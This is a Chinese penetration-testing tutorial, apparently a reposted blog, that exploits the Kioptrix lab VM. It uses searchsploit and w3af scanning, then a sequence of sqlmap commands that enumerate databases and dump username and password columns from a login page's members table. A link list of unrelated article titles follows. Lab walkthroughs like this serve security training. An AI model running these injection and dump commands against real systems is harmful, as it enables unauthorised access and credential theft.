渗透测试漏洞利用之漏洞攻击
来源:互联网 发布:信鸽血统软件 编辑:程序博客网 时间:2024/04/29 16:43
1. 查找目标系统的相关漏洞
在前一篇渗透测试的博文中,介绍了目标系统相关信息的收集方法。接下来,任意Kioptrix靶机为例,具体介绍下相关漏洞的详细利用过程。
在exploit-db.com网站上,一般能够找到已知漏洞的有价值的信息,以及验证其有效性的概念验证代码(POC)。概念验证代码可以帮助你理解这个漏洞的原理和形成机制,从而让你能够确定防护措施是否正常工作。
2. 离线的漏洞库
在Kali Linux中,自动包含了一份漏洞库在/usr/share/exploitdb/
中。使用searchsploit命令进行搜素漏洞。
# searchploit samba
这是列出了samba服务器对应版本的各种漏洞信息,仔细查看,并没有我们目标系统samba服务器(上一章博文中最后扫描中列出)3.0.28a相关的漏洞,这时我们可以去网上搜所,也可以更新本地的漏洞库,这里不作详述了。
3. 使用w3af工具
w3af是一个web漏洞扫描利用的神器。下面介绍一下他的使用方法。在Kali Linux的终端下输入w3af_gui
,启动它的图形界面版。
然后在scan config中选择“full_audit”,勾选bruteforce插件,再在Target地址栏中输入目标靶机的URL,然后点击“Start”开始扫描。
在log标签栏中可以查看扫描的日志。
在Result标签栏中可以查看扫描的结果,在结果中可以看到一些红色标记的漏洞,有sqli(SQL注入)漏洞,click_hajacking漏洞。这些都是可利用的漏洞。
4. 使用sqlmap进行sql注入
1). 使用sqlmap命令,dump出入侵所需要用到的数据库信息。
# sqlmap -u 192.168.50.102/checklogin.php --data mypassword=1
**注意:**192.168.50.102提供的登录服务是POST的方式,要用–data选项,后跟要发送的内容。
使用下列命令列出所有的数据库。 `sqlmap -u http://192.168.50.102/checklogin.php --data mypassword=1 --dbs
查看members数据库的内容:
sqlmap -u http://192.168.50.102/checklogin.php --data mypassword=1 -D members --tables
列出表的列名:
sqlmap -u http://192.168.50.102/checklogin.php --data mypassword=1 -D members -T members --columns
列出表内容:
# sqlmap -u http://192.168.50.102/checklogin.php --data mypassword=1 -D members -T members -C username,password --dump
- 渗透测试漏洞利用之漏洞攻击
- 渗透测试之漏洞利用开启篇
- 渗透测试之手动漏洞利用
- 渗透测试之解析漏洞
- 《渗透测试实践指南》读书笔记之漏洞利用
- 渗透测试之漏洞扫描阶段
- 渗透测试之漏洞扫描WVS篇
- 渗透测试之目录遍历漏洞
- 渗透测试之本地文件包含漏洞
- 利用数据库漏洞扫描评估数据库安全性 6 渗透攻击
- 小白日记24:kali渗透测试之提权(四)--利用漏洞提权
- metasploit文件格式漏洞渗透攻击(失败)
- 渗透测试之信息收集漏洞库篇
- 渗透测试之未经验证的重定向漏洞
- Back Track 5 之 漏洞攻击 && 密码攻击 && Windows下渗透工具
- 小白日记35:kali渗透测试之Web渗透-手动漏洞挖掘(一)-默认安装引发的漏洞
- 跨站脚本攻击深入解析之:漏洞利用过程
- 利用phpcms后台漏洞渗透某色情网站
- Cocos2d-x之CCImage深入分析
- android MotionEvent中getX()和getRawX()的区别
- linux bash
- 计算机补码学习
- mysql 添加/删除主键
- 渗透测试漏洞利用之漏洞攻击
- <二> Linux如何学习
- 第一个JAVA的窗口
- 安装Redis(Mac环境下的解决方案)
- 黑马程序员--------8种基本数据类型的封装类
- 基于xposed的短信拦截
- linux 补充
- 《C#程序设计》第六次作业:《猜猜看》游戏
- 将任意的十进制整数转换成任意R进制数(R在2-16之间)